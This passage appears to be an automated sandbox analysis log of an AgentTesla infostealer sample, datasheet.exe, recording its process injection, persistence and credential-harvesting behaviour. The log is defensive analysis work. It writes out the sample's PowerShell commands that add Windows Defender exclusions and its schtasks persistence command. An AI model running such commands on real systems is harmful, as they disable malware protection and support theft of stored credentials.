                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95063
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94953
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94844
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93985
                    Source: RegSvcs.exe, 00000009.00000002.2225101640.00000000064F2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\datasheet.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe"
                    Source: C:\Users\user\Desktop\datasheet.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe"
                    Source: C:\Users\user\Desktop\datasheet.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe"Jump to behavior
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\datasheet.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\datasheet.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\datasheet.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000Jump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F1E008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: BE7008Jump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmpA381.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeQueries volume information: C:\Users\user\Desktop\datasheet.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeQueries volume information: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\datasheet.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.datasheet.exe.3d93ea0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.datasheet.exe.3dd06c0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.datasheet.exe.3d93ea0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2218212331.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2218212331.00000000031EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2213872719.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2188466952.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: datasheet.exe PID: 2960, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7088, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7392, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
